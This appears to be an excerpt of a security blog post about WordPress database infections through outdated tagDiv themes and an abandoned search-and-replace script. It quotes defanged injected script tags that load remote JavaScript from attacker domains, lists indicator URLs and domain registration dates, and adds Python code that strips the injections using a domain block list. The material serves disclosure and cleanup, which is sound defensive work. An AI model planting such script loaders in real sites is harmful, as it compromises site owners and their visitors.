Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'></script>


<s cript type="text/javascript">var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";


The most noticeable malicious URLs that we’ve seen lately are:

  • con1.sometimesfree[.]biz/c.js (Bulgaria)
  • java.sometimesfree[.]biz/counter.js (Bulgaria)
  • javascript.sometimesfree[.]biz/script.js (Bulgaria)
  • js.givemealetter[.]biz/script.js (Bulgaria)
  • go.givemealetter[.]biz/click.html (Bulgaria)
  • traffictrade[.]life/scripts.js (United Kingdom)
  • blue.traffictrade[.]life/main.js (United Kingdom)
  • js.trysomethingnew[.]eu/analytics.js (Bulgaria)
  • get.simplefunsite[.]info/rw.js (does not resolve at the moment)
  • post.simplefunsite[.]info/go.php?rewrite=81 (does not resolve at the moment)
  • src.dancewithme[.]biz/src.js (Russia)
  • go.dancewithme[.]biz/red.php (Russia)
  • mp.trymynewspirit[.]com/s.js (Bulgaria)

They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on Aug 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite[.]info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017
  • trymynewspirit[.]com – created on September 18th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!
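The cleanup described above, as an added example that is not code from the original post: it removes external script elements whose src host falls under the domains listed above and leaves every other script in place. The function names and the sample rows are constructed for illustration, and it covers only the first injected form shown (a script element with a src attribute).

```python
import re
from urllib.parse import urlparse

# Domains listed in the post, kept defanged in source and refanged at run time.
BAD_DOMAINS_DEFANGED = [
    "traffictrade[.]life", "trysomethingnew[.]eu", "sometimesfree[.]biz",
    "givemealetter[.]biz", "simplefunsite[.]info", "dancewithme[.]biz",
    "trymynewspirit[.]com",
]

def refang(text):
    return text.replace("hxxp", "http").replace("[.]", ".")

BAD_DOMAINS = tuple(refang(d) for d in BAD_DOMAINS_DEFANGED)

# External script element with an empty body: <script ... src='URL'></script>
SCRIPT_RE = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']([^"']+)["'][^>]*>\s*</script>""",
    re.IGNORECASE,
)

def is_bad_host(url):
    """True if the URL's host is a listed domain or one of its subdomains."""
    host = (urlparse(url if "//" in url else "//" + url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in BAD_DOMAINS)

def clean_post(content):
    """Return (cleaned_content, removed_urls); other scripts are left alone."""
    removed = []
    def drop(match):
        if is_bad_host(match.group(1)):
            removed.append(match.group(1))
            return ""
        return match.group(0)
    return SCRIPT_RE.sub(drop, content), removed

def scan(posts):
    """Map post ID -> removed URLs for every post that contained injections."""
    hits = {pid: clean_post(body)[1] for pid, body in posts.items()}
    return {pid: urls for pid, urls in hits.items() if urls}

# Constructed rows standing in for wp_posts (ID -> post_content).
SAMPLE_POSTS = {
    101: refang("<p><script type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>"
                "</script><a href='/about'>About</a> <script src='//js.givemealetter[.]biz/script.js'>"
                "</script><a href='/news'>News</a></p>"),
    102: "<p><script src='https://cdn.example.com/w.js'></script><a href='/x'>x</a></p>",
}
```

This handles plain post_content only. A value stored as a PHP-serialized string carries a length prefix, so it has to be unserialized, cleaned and re-serialized rather than edited in place.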

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.
